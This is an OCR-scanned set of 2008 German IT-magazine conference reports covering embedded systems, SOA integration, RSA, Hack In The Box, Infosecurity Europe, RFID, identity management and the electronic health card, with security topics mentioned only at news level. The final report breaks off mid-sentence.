Bitkom: Gute Chancen im Embedded-Bereich 


Embedded Systems sind zen- 
traler Bestandteil aktueller Pro- 
dukte der Investitionsgüter-In- 
dustrie. Ein Grund für Bitkom 
für ein Pressegespräch auf der 
Hannover Messe - gleichzeitig 
eine Premiere des ITK-Bran- 
chenverbands auf der tradi- 
tionsgemäß für Maschinen und 
Anlagen bekannten Messe. 

„Ob in der Medizintechnik, 
bei Herzschrittmachern und 
Magnetresonanztomographen 
oder der Automation von in- 
dustriellen Anlagen, überall 
heißt es: Embedded Systems 
inside.“ Das betonte Bitkom- 
Vizepräsident Heinz-Paul Bonn. 
Die verarbeitende Industrie er- 
ziele rund 80 Prozent ihrer 
Wertschöpfung mit Produkten, 
die Embedded Systeme enthal- 
ten. So befinden sich in aktuel- 
len Mittelklassewagen mittler- 
weile über 70 Prozessoren — vor 
25 Jahren seien es erst sechs 
gewesen. In einem einzigen 
Auto laufen Softwarekompo- 
nenten mit 10 Millionen Code- 
zeilen — 2015 sollen es 100 
Millionen sein. 

Genug zu tun also für Soft- 
wareentwickler. 80000 System- 
entwickler arbeiten hierzulan- 
de an Embedded Software, 
berichtete Bonn. Weiterer Trend: 
Lange Jahre haben Anwender- 
branchen wie die Auomobil- 
industrie oder der Maschinen- 
bau ihre Embedded Software 
selbst entwickelt. Nun haben 
sich immer mehr neue Unter- 
nehmen auf die Embedded 
Systems spezialisiert und ent- 
wickeln zum Beispiel mit Em- 
bedded Linux oder Java Micro 
Edition. 

Der Grad der Auslagerung 
der Softwareentwicklung für 
Embedded Systems ist je nach 
Region noch sehr unterschied- 
lich: In Europa lagern 34 Pro- 


zent aus, in den USA sind es 47 
Prozent, in Japan 76 Prozent. 
Dieser Trend wird sich verstär- 
ken, so die Einschätzung. 

Bislang steht Deutschland 
im internationalen Vergleich 
gut da. Nach den USA und Ja- 
pan ist Deutschland derzeit der 
drittgrößte Hersteller. Aber auf- 
grund der Konkurrenz aus asia- 
tischen Ländern wie Südkorea, 
China und Indien ist diese star- 
ke Stellung in Gefahr, warnt 
Bonn. Sein Verband rechnet 
für die asiatische Embedded- 
Systems-Industrie (ohne Japan) 
bis 2010 mit einem jährlichen 
Wachstum von 14 Prozent, für 
Europa sind es 8 Prozent. „Nur 
schnelles Handeln kann die bis- 
lang gute deutsche Marktposi- 
tion erhalten“, betonte Bonn. 

Aber die Bedeutung von 
Embedded Systems speziell für 
den Investitionsgüterbereich 
werde in Deutschland noch 
nicht richtig erkannt: Zum ei- 
nen seien die Systeme unsicht- 
bar. Zum anderen gäbe es keine 
eigenständige Embedded-Sys- 
tems-Industrie, sondern die 
Systeme entstünden an der 
Schnittstelle zwischen Halb- 
leiter- und Softwareindustrie 
auf der einen Seite und den 
Anwenderbranchen auf der 
anderen Seite. 

Mit zwei Maßnahmen will 
Bitkom dem entgegenwirken: 
Bereits Ende letzten Jahres hat 
der Verband einen eigenen 
Arbeitskreis „Softwareintensi- 
ve eingebettete Systeme“ ge- 
gründet. Dann wird es im 
Herbst eine neue Studie ge- 
ben: Beauftragt wurden Pierre 
Audoin Consultants (PAC) 
und TechConsult. Beteiligt ist 
auch das Bundeswirtschafts- 
ministerium für Wirtschaft 
und Technologie. 

Barbara Lange 
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Business Integration Forum: Fortschritte bei SOA 


Bunter Reigen 


Achim Born 


Wieder bot das Business Integration Forum in 
Wiesbaden reichlich Stoff zum Thema. Einige sehen 
hier Open-Source-Produkte im Aufwind, andere 
wollen die leidigen Integrationsaufgaben SaaS- 


Anbietern überlassen. 


W er sich heute über IT-Inte- 
gration unterhält, kommt 
um die serviceorientierten Ar- 
chitekturen nicht herum. So 
war es konsequent, dass Wolf- 
gang Martin zum Auftakt des 
diesjährigen Business Integra- 
tion Forum über den Status 
Quo des marketingträchtigen 
Themas referierte. „Der Hype 
ist raus, die Einschätzung der 
Bedeutung von SOA ist realis- 
tischer geworden“, fasste der 
Vorsitzende des IIR-Kongres- 
ses in Wiesbaden die Ergeb- 
nisse des diesjährigen SOA- 
Checks zusammen. 

Seinen Ausführungen zu- 
folge haben die Firmen gegen- 
über 2007 nachweisbar Fort- 
schritte gemacht. So sei im 
Zusammenhang mit SOA der 
Top-down-Ansatz mit Ge- 
schäftsprozessen als Ausgangs- 
punkt akzeptiert. Allerdings 
belegten die Ergebnisse der 
Umfrage auch, dass der Zieler- 
reichungsgrad der SOA-Projek- 
te (siehe Abb. 1) nach wie vor 
zu wünschen übrig lässt. Dieses 
Ergebnis weist nach Ansicht 
von Martin auf eine mangelhaft 


ausgeprägte SOA-Governance 
in den Unternehmen hin. Das 
Management müsse deshalb 
dringend sein Verständnis für 
die administrativen und orga- 
nisatorischen Aufgaben von 
Services und Prozessen ver- 
bessern, andernfalls drohe ein 
Servicechaos. 

Services lassen sich in einer 
SOA auf allen Ebenen finden — 
von der Infrastruktur über 
fachliche Komponenten bis hin 
zu Analysediensten oder Do- 
kumentenverarbeitung. Zudem 
werden Prozesse, Regeln und 
Stammdaten vermehrt applika- 
tionsunabhängig als Services 
bereitgestellt. Entsprechend bunt 
gestaltet sich der Reigen der 
Integrationsaufgaben. 

Peter Kempf von der Uni- 
credit HVB Group stellte das 
Enterprise-Architekturmodell 
seines Hauses vor. Im Zentrum 
steht das TOGAF (The Open 
Group Architecture Frame- 
work), das sich aus den Ebenen 
Prozess-, Domain- (Service- 
Domänen) Integrations- sowie 
Systemmodell (technische Platt- 
formen) zusammensetzt. Alle 


Zielerreichungsgrade in SOA-Projekten 


unter 50%  50%bis59% 


60% bis 79% 


EI 2008 
EI 2007 


Quelle; $.A.R.L. Martin, 2008 FH 


4% 


80% bis 95 % über 95% 


Modelle liegen in einem Re- 
pository. Mit diesem umfang- 
reichen Ansatz will man die 
Services vereinheitlichen und 
vereinfachen. 

Die Credit Suisse nutzt ei- 
ne Java-Application-Plattform 
als Integrationsgrundlage für 
selbstentwickelte Anwendun- 
gen, die der zuständige Ent- 
wicklungschef Thomas Koch 
vorstellte. Zum Start vor rund 
neun Jahren war die Sache 
technisch geprägt. Das gilt 
noch heute, auch wenn hand- 
feste wirtschaftliche Gründe 
(15 % niedrigere Betriebskos- 
ten pro Jahr) das bankeigene 
Konzept leiten. Zudem löst 
ein Kompositionskonzept das 
traditionelle Programmiermo- 
dell ab. Das Weblogic-Portal 
ermöglicht eine neue Klasse 
zusammengeführter Applikatio- 
nen. Einerseits mindert diese 
Integrationstechnik die Kom- 
plexität der Hintergrundanwen- 
dungen, andererseits erzeugt 
sie neue Abhängigkeiten zwi- 
schen Programmen und wirft 
Versionierungsfragen und Ähn- 
liches auf. 

Dass Unternehmen ihre In- 
tegrationsarchitekturen nicht 
zwangsläufig aus lizenzpflich- 
tigen Softwarekomponenten 
aufbauen müssen, zeigte ein 
Vortrag über die kommende 
EAI-Landschaft (Enterprise 
Application Integration) bei 
Union Investment. Ihre im Jahr 
2002 eingeführte monolithi- 
sche Middleware will die Ka- 
pitalanlagefirma durch eine 
Reihe von Open-Source-Kom- 
ponenten ersetzen. Dazu gehö- 
ren JBoss’ Application Server, 
die Messaging-Komponente 
JBossMQ, als J2EE-Umge- 
bung der JCA Container, der 
Enterprise Service Bus Apache 


Servicemix sowie die Model- 
lierungsumgebung jBPM. Ei- 
genentwicklungen an der ei- 
nen oder anderen Stelle sollen 
die Unternehmenstauglichkeit 
sicherstellen. Dies betrifft et- 
wa den Einbau von Service- 
mix in JBoss. Die Erfahrungen 
sind überaus positiv. So erfüllen 
die Basiskomponenten pro- 
blemlos die Anforderungen be- 
züglich Stabilität, und die Ser- 
vicemix-Lösung brachte einen 
deutlichen Performancegewinn. 

Andreas von Gunten, Chef 
der Schweizer Parx AG, be- 
zweifelt, dass sich sich Unter- 
nehmen künftig überhaupt mit 
Integrationsfragen im eigenen 
Hause beschäftigen müssen. Er 
warb eindringlich für das SaaS- 
Konzept (Software as a Ser- 
vice). Die gehosteten Anwen- 
dungsdienste böten mindestens 
Integrationsfunktionen über 
Webservices API oder Mash- 
ups. Für komplexere Aufgaben 
stünden der Open-Source-Inte- 
grationsserver Jitterbit (www. 
Jitterbit.com) sowie der On-de 
mand-Service Boomi (www. 
boomi.com) bereit. 

Parallel fand das Enterprise 
Architecture Management Fo- 
rum statt. Unter dem Motto 
„Bauplan der IT: Optimale 
Unterstützung der Geschäfts- 
prozesse durch die IT-System- 
landschaft“ erläuterten Ver- 
treter namhafter Anwender 
(Deutsche Telekom, Münchener 
Rück, Kühne+Nagel, BMW), 
wie sie die IT-Architektur in 
ihren Unternehmen planen, 
überwachen und steuern. Die 
inhaltliche Nähe der beiden 
Veranstaltungen erschwerte lei- 
der das Zusammenstellen des 
eigenen Programms aus den 
parallel laufenden Vortrags- 
strängen. (jd) 


IIR Web-2.0-Kongress 


Parallel zu den im Haupttext 
beschriebenen Foren lief in 
Wiesbaden der vierte IIR Web- 
2.0-Kongress. Das Programm 
umfasste Beiträge zur Anwen- 
dung entsprechender Techniken 
in der Unternehmenskommuni- 
kation und im kommerziellen 
Marketing. Neben den üblichen 
Referenten zu Social Networ- 
king (von Myspace, StudioVZ et 
cetera) erläuterten Vertreter von 
Sixt und Fraport den Einsatz 
von Wikis für die firmeninterne 
Zusammenarbeit. Beispielsweise 


ergänzt Skywiki des Frankfurter 
Flughafenbetreibers heute mit 
rund 1200 Artikeln das vorhan- 
dene Intranet. Es basiert auf dem 
ursprünglich für Wikipedia ge- 
schriebenen Mediawiki. Die 
wissenschaftliche Abrundung 
des Kongresses oblag Eero Hy- 
vönen. Der Professor der Helsin- 
ki University of Technology 
stellte den Teilnehmern das Na- 
tional Semantic Web Ontology 
Project in Finnland (FinnON- 
TO) sowie das Folgeprojekt 
Semantic Web 2.0 vor. 
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MARKT + TRENDS 


Security 


Natur als Vorbild für IT-Sicherheit 


Jäger und 


Geiagte 


Arno Puder 


Mit der IT-Sicherheit ist es wie mit der Evolution: 
Nur wer flexibel bleibt, kann gewinnen. Das, so war 
auf der 17. RSA-Konferenz zu hören, gilt vor allem 
beim Kampf gegen Spam und Kreditkartenbetrug. 


MM: April fand die nord- 
amerikanische Ausgabe 


der diesjährigen RSA-Konfe- 
renz in San Francisco statt. Mit 
17 000 Teilnehmern konnte die 
wichtigste Konferenz zum 
Thema Sicherheit wieder ei- 
nen neuen Rekord aufstellen. 
Craig Mundie von Microsoft 
sieht das Social Engineering als 
die größte Herausforderung für 
die Sicherheit. Sicherheit ist oft 
orthogonal zur Privatsphäre ei- 
ner Person und so fordert Mun- 
die, was er „Situational Privacy“ 
nennt: In bestimmten Situatio- 
nen werden lediglich zwingend 
notwendige Informationen frei- 
gegeben (z. B. Alterskontrolle), 
ohne jedoch die Identität des 
Benutzers preiszugeben. 
Michael Chertoff von der 
Heimatschutzbehörde in den 
USA hob hervor, dass Cyber- 
kriminalität insbesondere des- 
wegen kritisch ist, weil eine 
einzelne Person großen Scha- 
den anrichten kann. Er verwies 
auf die DDoS-Attacke gegen 
die estländische Regierung vom 
vergangenen Jahr. 
Dauerbrenner Spam: Wäh- 
rend es im Internet relativ ein- 
fach ist, Spuren zu verwischen, 
fällt es den Kriminellen wesent- 
lich schwerer, Geldtransaktio- 
nen zu verschleiern. Kimberly 
Kiefer Peretti vom US-Justiz- 
ministerium führte aus, wie die 
Kriminellen ein nach dem Pay- 
pal-Prinzip funktionierendes 
Bankwesen aufgebaut haben. 
Oft sind Gesetzeshüter macht- 
los, weil diese Organisationen 
über nationale Grenzen hinweg 
agieren. Paul Kocher, bekannt 
durch die Differential Power 
Analysis, zog in seinem Vor- 
trag Parallelen zu evolutionären 


Prozessen, bei denen Jäger und 
Gejagte einander gegenüberste- 
hen. Seiner Meinung nach kann 
im Kampf gegen Spam und 
Kreditkartenbetrug ein Ver- 
gleich mit der Natur neue Im- 
pulse bieten. So schützen sich 
in der Natur oftmals Gejagte, 
indem sie sich flexibel an neue 
Situationen anpassen. 


Blu-ray evolutionärer 
Gewinner 


Laut Kocher war das auch der 
Grund dafür, dass sich Blu-ray 
gegenüber HD-DVD durchge- 
setzt hat. Bei Blu-ray können 
neue Sicherheitsmechanismen 
quasi im Huckepack mit neuen 
Filmen auf einer Disk nachin- 
stalliert werden, wohingegen 
HD-DVD keine Möglichkeit 
für dynamische Sicherheits-Up- 
dates bietet. Im Sinne eines 
evolutionären Prozesses erlaubt 
Blu-ray somit bessere Strate- 
gien gegen Piraterie. 

Ein anderer Schwerpunkt der 
diesjährigen RSA-Konferenz 
war Virtualisierung. Sie entwi- 
ckelt sich allmählich zum Hei- 
ligen Gral für das Management 
von IT-Infrastrukturen. Jedoch 
wirft insbesondere die mit ihr 
einhergehende Dynamik neue 
Sicherheitsfragen auf. Was pas- 
siert etwa mit Firewall-Policies, 
wenn das zugehörige System in 
ein anderes Subnetz migriert 
wird? Ebenso kann theoretisch 
das Gastsystem durch einen 
Fehler in der Virtualisierungs- 
software den Host manipulie- 
ren. Andererseits kann die Vir- 
tualisierung bei der Umsetzung 
von Sicherheitskonzepten hilf- 
reich sein. (ur) 
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„Privilege Escalation” unter allen Windows-Systemen 


Im Sandkasten 


Michael Dipper 


Auch vor der trockenen Wüstenregion in den Vereinigten Arabischen Emiraten 
macht die Security-Szene keinen Halt. Datenbanken hacken, Cell-Prozessoren 
angreifen oder das Beschaffen von eigentlich verbotenen Privilegien 


funktioniert eben weltweit. 


ie zweite Hack In The Box 

(HITB) in Dubai startete 
mit einer Keynote von Bruce 
Schneier, die den Zuhörer zum 
Nachdenken anregte: Sind von 
uns aufgestellte Modelle für Si- 
cherheit, die wirklich erreichte 
Sicherheit und ein daraus ent- 
stehendes, subjektives Gefühl 
von Sicherheit immer gleich 
oder lassen wir uns nur von ge- 
fühlter Sicherheit beeinflussen? 
Basierend auf einer früheren 
Veröffentlichung (siehe iX- 
Link) stellte er dieses Thema 
unterhaltsam dar und zeigte Pa- 
rallelen zwischen IT und Alltag. 

Rodrigo Rubira Branco de- 
monstrierte in seinem Vortrag 
„Hacking The Cell Architec- 
ture“, wie sich die spezielle Ar- 
chitektur der Cell-Prozessoren 
für Angriffe ausnutzen lässt. 
Ursache hierfür ist der fehlen- 
de Speicherschutz im lokalen 
Speicher der einzelnen CPU- 
Kerne. Durch sichere Program- 


mierung können derartige An- 
griffe zwar unterbunden wer- 
den, doch dies liegt allein in der 
Verantwortung des Entwick- 
lers. Cell-Prozessoren finden 
sich in IBM-Blade-Servern. 

Neue Wege, illegale Zugrif- 
fe auf Datenbanken zu erken- 
nen, diskutierte der Oracle-Ex- 
perte Alexander Kornbrust in 
„Practical Oracle Forensics“. 
Im Fokus standen ungewöhnli- 
che Quellen für Informationen 
wie das Listener Log, die Se- 
quenznummern in (manipulier- 
ten) Audit Logs oder die Com- 
mand History, die nur im 
Arbeitsspeicher liegt. Solche 
Informationen sind wichtig, 
wenn der Angreifer etwa der 
Datenbankadministrator ist und 
seine Zugriffe in Logdateien 
verschleiern kann. 

In einem weniger techni- 
schen Vortrag zeigten Raoul 
Chiesa und Alessio Pennasilico 
das Auffinden und die Auswir- 


kung möglicher Schwachstellen 
in sogenannten SCADA-Umge- 
bungen. Hierunter versteht man 
die Messdatenerfassung und 
-verarbeitung in der Prozess- 
automatisierung. Wenn ein An- 
greifer Schwachstellen in den 
Regelkreisen der Elektrizitäts-, 
Gas- oder beispielsweise Was- 
serversorger ausnutzt, sind die 
Folgen meist fatal. 


Übernahme von 
Identitäten 


Ein Glanzlicht der Konferenz 
war der Vortrag „Token Kid- 
napping“ von Cesar Cerrudo. 
Der Argentinier erläuterte, 
wie sich in allen aktuellen 
Windows-Versionen bis ein- 
schließlich Windows Server 
2008 von einem eingeschränk- 
ten Benutzerkonto aus eine 
sogenannte „Privilege Escala- 
tion“ durchführen lässt. Dies 


geschieht über Schwachstellen 
in Diensten, die das Recht zur 
Identitätsübernahme (imperso- 
nation) besitzen und unter Um- 
ständen im Besitz von Sicher- 
heits-Token mit Rechten des 
System-Accounts sind. Als 
Workaround empfiehlt Cesar 
Cerrudo derzeit, Dienste wie 
den IIS unter einem lokalen 
Benutzerkonto und nicht als 
„lokalen Dienst“ zu starten. 
Microsoft bestätigte mittler- 
weile die Schwachstelle und 
arbeitet an entsprechenden Pat- 
ches (siehe iX-Link). 
„Skyper“ von „The Ha- 
cker’s Choice“ (thc.org) gab 
ein Update zum GSM-Projekt, 
das das Abhören und Ent- 
schlüsseln von Handy-Verbin- 
dungen mit einfachster Hard- 
ware (circa 500 €) ermöglicht. 
Ziel des Projektes ist es, durch 
Ausnutzung von Schwachstel- 
len der A5/1-Verschlüsselung 
jedes Gespräch und auch SMS- 
Verbindungen binnen 30 Se- 
kunden zu knacken. Die dazu 
erforderlichen Rainbow-Tables 
sind mehr als 2 TByte groß 
und derzeit zu rund 75 % be- 
rechnet. Sie sollen nach Fertig- 
stellung zum Download ange- 
boten werden. Überdies plant 
das Projekt ein Web-Interface, 
über das man Verbindungsmit- 
schnitte hochladen und gleich 
online entschlüsseln kann. 
Alle Vorträge der HITB Du- 
bai finden sich auf der Konfe- 
renzseite (www.hitb.org). (ur) 
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MARKT + TRENDS 


Security 


„De-Perimeterisierung” auf dem Vormarsch? 


Porös infgsscurty 


Reinhard Wobst 


22-24 April 2008 
London, United Kingdom 
wwvw.infosec.co.uk 


Wenn Geschäftskommunikation auf immer stärkerer 
Vernetzung fußt, ist es schwierig, das Unternehmens- 
netz gegen Gefahren abzuschotten. Die Allzweckwaffe 
Verschlüsselung mag zwar gegen manchen Missbrauch 
helfen, hat aber andere Nachteile. 


er bedeutende Treff der 

Sicherheitsszene, die Info- 
security Europe 2008, fand En- 
de April in der Olympiahalle 
in London unter Beteiligung 
von über 300 Ausstellern statt, 
mit zahlreichen Vorträgen und 
12500 Besuchern. Wieder ein- 
mal wurde klar, mit welch 
komplexen Problemen die Da- 
tensicherheit heute zu kämpfen 
hat. Besonders eindrücklich 
zeigte dies Geraint Price (Royal 
Holloway University of Lon- 
don) in seinem Vortrag „De- 
Perimeterisation: Fact or Fic- 
tion?“: Die früheren Modelle 
zur Absicherung des Datenver- 
kehrs greifen nicht mehr, weil 
beim heutigen Stand der Ver- 
netzung und der Mobilität die 
„Festungen“ verschwinden. 


Alte Trust-Modelle 


greifen nicht mehr 


Nicht nur durch Outsourcing 
und Vernetzung, sondern auch 
durch immer neue Kommuni- 
kationsformen und den stark 
angestiegenen Austausch ge- 
schäftlicher Informationen sind 
Wissen und Prozesse kaum 
noch lokal zu halten. Es gibt 
ständig neue Herausforderun- 
gen und technische Entwicklun- 
gen wie mobile Endgeräte und 
Flash-Speicher. Obendrein ge- 
hören die Endpunkte der Kom- 
munikation oft anderen, was 
klassische Trust-Modelle über 
den Haufen wirft. Verschlüsse- 
lung allein ist nicht die Lösung, 
denn das Keyhandling ist der 
schwache Punkt — vor allem, 
wenn es keine zentrale Auto- 
rität gibt. Eine konsistente Si- 
cherheits-Policy wird so frag- 
lich. Nach Price’ Ansicht steht 
die Sicherheitsforschung noch 
am Anfang. 


Ähnliche Bedenken äußerte 
der bekannte Experte Bruce 
Schneier, der wieder einmal 
über den Gegensatz von Rea- 
lität, gefühlter Sicherheit und 
Modell sprach. Die Einsicht, 
dass Rauchen schädlich ist 
(also die Anpassung des Mo- 
dells und das Entwickeln einer 
gefühlten Bedrohung), habe 
Jahrzehnte gebraucht. Das Pro- 
blem bei der Datensicherheit 
könnte sein, dass sich die Rea- 
lität — das heißt die Technik - 
zu schnell verändert, als dass 
der Anwender sich anpassen 
könnte. 

So gesehen war es logisch, 
dass eine Reihe von Ausstellern 
Produkte für ganzheitliche Si- 
cherheit anboten, etwa Device- 
lock, das Verschlüsselung auf 
externen Datenträgern erzwingt 
und die Synchronisation mit 
mobilen Geräten kontrolliert. 
Technisch beruht das Produkt 
auf einer Modifizierung des Ac- 
tive-Directory-Services, greift 
also nur in reinen Microsoft- 
Welten und ist auch nicht gegen 
qualifizierte Angreifer gefeit. 
Insbesondere wird das Key- 
handling Drittanbietern wie 
PGP überlassen, doch PGP ist 
nicht darauf aus, den Rechner 
vor seinem eigenen Anwender 
zu schützen. Ähnliches gilt für 
Credant Technologies’ Pro- 
dukte, die in Microsoft-Umge- 
bungen die Verschlüsselung 
externer Datenträger erzwin- 
gen. Beide Produkte werden in 
vielen Top-500-Unternehmen 
eingesetzt. 

Interessant war auch der 
Vortrag von Tomas Olovsson 
(AppGate Network Security) 
über den praktischen Einsatz 
von Open-Source-Software, der 
ihre sicherheitstechnischen und 
wirtschaftlichen Vorteile ein- 
drucksvoll erläuterte. (ur) 
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RFID 


Was die RFID-Einführung in der Praxis behindert 


Nutzen verteilen 


Barbara Lange 


Wenn mehrere Unternehmen in RFID-Projekten 
kooperieren, entstehen ganz neue Fragen: Welche 
Daten sollte man für andere freigeben? Wie aus den 
Riesen-Datenmengen handhabbare Informationen 
generieren? Im Projekt „Ko-RFID - Kollaboration und 
RFID” arbeiten Industrie und Wissenschaft zusammen. 


Be will man, wa- 
rum die Einführung von 
RFID schleppender läuft, als es 
der Hype vor einigen Jahren 
hätte vermuten lassen. Ein 
Grund könnte sein, dass Kosten 
und Nutzen ganz unterschied- 
lich auf die einzelnen Partner 
verteilt sind. Wie man die 
gleichmäßig auf alle Beteilig- 
ten verteilen kann, soll das von 
BMWi mit fünf Millionen Euro 
geförderte Projekt „Ko-RFID - 
Kollaboration und RFID“ her- 
ausfinden. 

Beteiligt sind die Humboldt- 
Universität und die Technische 
Universität aus Berlin, die Otto- 
von-Guericke-Universität Mag- 
deburg, Gerry Weber Interna- 
tional AG, Gustav Wellmann 
GmbH & Co. KG, Daimler AG 
und die SAP AG. Sie trafen 
sich Mitte April zur zweiten 
Jahreskonferenz in der Berliner 
Humboldt-Universität. 


Hohe Investitionen 
am Anfang 


Dass die Vorteile für die einzel- 
nen Unternehmen sehr unter- 
schiedlich sind, fanden die Wis- 
senschaftler durch eine Umfrage 
in der Automobilbranche her- 
aus. Für die Zulieferer zählt vor 
allem der Wettbewerbsdruck bei 
der Entscheidung für RFID. 
Auch gibt es in der Pilotphase 
hohe Kosten, und der Nutzen 
zeigt sich erst viel später, wie 
ein Vertreter von Gerry We- 
ber in einem Praxisbericht er- 
läuterte. 

Mit einem Ko-RFID-Emp- 
fehlungs-Tool haben die Wis- 
senschaftler ein Werkzeug 
entwickelt, das Unternehmen 
beim Ermitteln von Nutzen und 
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Risiko von RFID-Projekten 
unterstützt. 

Eine Herausforderung für die 
Forschung ergibt sich auch aus 
den großen Datenmengen, die 
RFID-Systeme erzeugen. Vom 
Datenmanagement berichtete 
Gregor Hackenbroich, Research 
Program Manager bei SAP Re- 
search. Ziel ist es, Suchanfra- 
gen wie „Wo ist eine bestimmte 
Warenlieferung gerade, und 
sind auch alle bestellten Pro- 
dukte dabei?‘ schnell zu beant- 
worten, was gar nicht so leicht 
ist, vor allem, wenn die Fra- 
gen nicht zur Datenbankstruk- 
tur passen. 

Als Architektur für das Da- 
tenmanagement sind technisch 
möglich: strukturierte P2P- 
Netzwerke oder die zentrale Da- 
tenhaltung in einem Knoten. 
Machbar ist ebenfalls, dass ein 
zentraler Knoten die Indizes für 
Objekte vorhält, eine Variante, 
die EPCglobal mit dem Object 
Name Server (ONS) favorisiert. 

Vom Data-Mining berichte- 
ten Myra Spiliopoulou und 
Florian Kähne von der Otto- 
von-Guericke-Universität Mag- 
deburg: Wie aus den verteilt lie- 
genden Daten Informationen 
generieren? Unternehmen soll- 
ten keine Rohdaten aus RFID- 
Prozessen freigeben, sondern 
nur aggregierte Daten, da man 
selbst anonymisierte Daten 
wieder de-anonymisieren kann. 
Derzeit beschäftigt man sich 
damit, wie viel Datenverlust da- 
bei akzeptabel ist. In einem 
nächsten Schritt wollen die 
Wissenschaftler untersuchen, 
ob sich aus den Daten Informa- 
tionen generieren lassen, die die 
Unternehmen, die ja auch Kon- 
kurrenten sind, gar nicht offen- 
legen wollten. (ur) 
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Konferenzen 


Identitätsmanagement unterstützt Compliance 


Rollenspiele 


Susanne Franke 


Dass Unternehmen auch beim Identitätsmanagement 
nicht an Themen wie Governance und Compliance 
vorbeikommen, zeigten die Beiträge der diesjährigen 
European Identity Conference 2008. 


ur European Identity Con- 

ference, die in diesem Jahr 
zum zweiten Mal stattfand, ka- 
men insgesamt 450 Teilneh- 
mer (20 Prozent mehr als im 
Vorjahr) aus 23 Ländern sowie 
50 Aussteller nach München. 
Mit dabei waren die „Großen“ 
wie CA, IBM, Microsoft, Ora- 
cle, Novell oder Sun, aber auch 
kleine Unternehmen. 

Mit Vorträgen von rund 130 
Sprechern und Diskussionsrun- 
den bot die Veranstaltung einen 
breiten Überblick sowohl über 
den Status Quo im Identity- und 
Access-Management (IAM) als 
auch über die praktische Um- 
setzung und die Trends. 

Eines der vorherrschenden 
Themen war der Trend zu 
„Identity 2.0“. Mittlerweile sind 
die Standards OpenID 2.0, Info- 
cards auf der Basis der Web- 
Service-Spezifikationen sowie 
SAML (Security Assertion 
Markup Language) vorhanden 
und laut Veranstalter Martin 
Kuppinger dabei, „Teil des 
wirklichen Lebens“ zu werden. 
Die Standards seien trotz noch 
offener Implementierungsfragen 
zunehmend interoperabel, so der 
Analyst in seiner Keynote, und 
Anbieter wie IBM, Microsoft, 
Novell, Yahoo, AOL und Goo- 
gle unterstützen alle bereits 
Identity 2.0 in ihren Produkten. 

Der Identitäts-Guru Kim Ca- 
meron von Microsoft stellte in 
seiner Keynote ein Identity 
Metasystem Model vor, dessen 
Grundlage die Nutzung von 
Identity-Netzwerken ist. Das 
bedeutet, dass für die Authenti- 
fizierung unterschiedliche Attri- 
bute oder „Claims“ herangezo- 
gen werden, und zwar je nach 
Anwendung und Kontext. Dies 
können Name, Adresse, Kenn- 
wort sein, aber auch Rolle. 

Er plädiert außerdem für 
ein Framework mit Protokol- 
len, über die verschiedene 
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Identity-Systeme interagieren 
und kontextspezifische Identity- 
Tokens für Online-Transak- 
tionen austauschen können. 
Als zentrales Repository für 
die persönlichen Benutzerda- 
ten müsse nicht etwa Micro- 
soft oder ein anderer Anbieter 
infrage kommen, sondern eher 
eine Vielzahl an öffentlichen 
und privaten Institutionen, die 
die Identitäten verwalten. 


Bewusstsein für 
Datenschutz gefordert 


Marit Hansen, Leiterin des Un- 
abhängigen Landeszentrums für 
Datenschutz Schleswig-Hol- 
stein, mahnte in einer Diskus- 
sion zur Zukunft der Web- 
Identität das Bewusstsein für 
Vertraulichkeitsprobleme mit 
digitalen Identitäten an und 
stellt die Frage, ob die soge- 
nannten Trusted Authorities 
Behörden sein sollten, private 
Unternehmen oder vielleicht 
gar ein ISP. Konflikte kann es 
auch im internationalen Um- 
feld geben, denn die Daten- 
schutzgesetze unterscheiden 
sich in den verschiedenen Län- 
dern voneinander. 

Als zweitwichtigsten Trend 
machte Kuppinger in seiner 
Keynote das Thema GRC (Go- 
vernance, Risk Management, 
Compliance) aus. Die vorhan- 
denen Werkzeuge für GRC die- 
nen der Verwaltung von digita- 
len IDs, dem Business Role 
Management (etwa der Rollen- 
vergabe an Nutzer), der Ver- 
gabe von Zugriffsrechten für 
Rollen, der Funktionstrennung 
(Segregation of Duties) oder 
dem Auditing-Bereich. Die 
Voraussetzung für den Erfolg 
von GRC jedoch ist die Unter- 
stützung durch ein starkes Iden- 
tity- und Access-Management, 
so Kuppinger. (ur) 


ConhlT 2008: eGK-Testlauf abgebrochen 


Hindernislauf 


Barbara Lange 


Spätestens mit der Einführung der elektronischen 
Gesundheitskarte müssen IT-Systeme und Menschen 
in Krankenhäusern, Arztpraxen, Apotheken sowie 
Krankenkassen zusammenarbeiten. Der Weg dorthin 


scheint weiter denn je. 


op-Thema der dreitägigen 

Kongressmesse ConhIT An- 
fang April in Berlin war die 
elektronische Gesundheitskarte 
(eGK). Gleich am ersten Tag 
kam der Hammer: Mitte März 
haben die Ärzte in Flensburg 
den Testlauf der elektronischen 
Gesundheitskarte abgebrochen, 
berichtete der Projektleiter der 
Testregion Schleswig Holstein, 
Jan Meincke. Der Grund: Die 
Eingabe der PIN ist zu kompli- 
ziert für ältere und chronisch 
kranke Patienten - 75 % von 
7553 Testpatienten schafften 
das nicht und sperrten ihre Kar- 
te. Die PIN ist aber notwendig, 
da die Patienten die Eingabe 
von freiwilligen Notfalldaten 
der Karte autorisieren müssen. 

Darüber hinaus gab es noch 
andere Projektprobleme, zum 
Beispiel falsche Zertifikate bei 
den ausgegebenen Heilberufe- 
ausweisen und daraus resultie- 
rende Verzögerungen. 

Auch wenn sich die Gesund- 
heitsbranche mit derlei Widrig- 
keiten herumschlagen muss, an 
der grundsätzlichen Notwen- 
digkeit von Gesundheitskarte 
samt Telematikinfrastruktur zur 
Gewährleistung eines rechts- 
konformen und abrechnungs- 
sicheren Verfahrens zweifelte 
niemand der 150 Aussteller und 
rund 2500 IT-Verantwortlichen, 
die nach Berlin gekommen wa- 
ren. Veranstalter der ConhIT 
waren der Verband der Her- 
steller von IT-Lösungen für 
das Gesundheitswesen e.V. 
(VHITG) und die Messe Berlin. 

Umstritten ist allerdings, ob 
das Rollout, wie von der 
Bundesregierung geplant, un- 
bedingt noch in diesem Jahr 
stattfinden muss — aufgrund 
technischer Probleme, aber 
auch mangels Akzeptanz etwa 
bei Ärzten und Patienten. 


Dass sektorenübergreifende 
IT-Systeme die vielfach noch 
vorhandenen isolierten medizi- 
nischen Systeme ablösen wer- 
den, ist ein notwendiger Trend, 
mit allen dazugehörenden Pro- 
blemen: Interoperabilität, Stan- 
dardisierung oder Archivierung. 
Die Produkte und Aussagen der 
Aussteller, darunter Siemens 
Medical Solutions, Agfa Health- 
care, iSOFT, SAP, HP, Micro- 
soft und Sun Microsystems, 
spiegelten das wider. 


Ohne Interoperabilität 
geht nichts 


Als Beispiele für die Interope- 
rabilität zeigten Partner des 
